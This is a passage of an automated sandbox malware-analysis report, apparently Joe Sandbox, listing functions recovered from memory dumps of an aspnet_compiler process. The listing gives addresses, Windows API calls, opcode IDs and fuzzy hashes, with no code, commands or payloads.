                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Function 0090FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 46 90fb68-90fb7d LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Function 0090FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 90fdc0-90fdd5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 29 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8
                                                Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 24 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8
                                                Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 39 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                APIs
                                                • ExitProcess.KERNELBASE(?), ref: 0042C157
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                Non-executed Functions

                                                Function 00900080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [Pj
                                                • API String ID: 0-2289356113
                                                • Opcode ID: 9a99eee722023492aff25a212910d8b9868680de85b5fbd83f705756b8935ef3
                                                • Instruction ID: 11bf0445707fbfb42ac792eb21369a4135df474638ff2232701c1730a228b40c
                                                • Opcode Fuzzy Hash: 9a99eee722023492aff25a212910d8b9868680de85b5fbd83f705756b8935ef3
                                                • Instruction Fuzzy Hash: FDF06D31208244AFEB22DB10CC85F2A7BB9AFC5754F14C819F8456A0D3C7668821E721
                                                Function 009226F8 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 97194e964baab974b63f2182347e793807f5b60ad3d47569104d946c8401b4b0
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: D6F0AF2132C169ABDB58EF18A99177A339DEB94300F54C439E949CB249D625AD408290
                                                Function 00960101 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction ID: feba373b7be43877dfa0b3e7321802ede6b63047e498ddc52f276ab28f72fd25
                                                • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction Fuzzy Hash: 4CF082722442099FCB1CCF04C4D0BBA37B6ABC1719F25442CE50B8F690D7399881DA54
                                                Function 009000EA Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 103616ab1e1361e5600627e557f05b3b552ec714c48f2a94b05d8f106d6a590a
                                                • Instruction ID: 0522b170cd82fc089b6eab8e0131f179bb6de3973d39b58ca5f2cb94a12941fd
                                                • Opcode Fuzzy Hash: 103616ab1e1361e5600627e557f05b3b552ec714c48f2a94b05d8f106d6a590a
                                                • Instruction Fuzzy Hash: 51E0E5B2549B81CFD321DF149901B1AB3E4FB88B10F15483AE80A97A90D7689A09CA52
                                                Function 009100C4 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Function 00910048 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Function 00910078 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Function 00910060 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Function 009101D4 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Function 0091010C Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Function 00910C40 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Function 009110D0 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Function 00911148 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Function 0090F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                Download Yara Rule
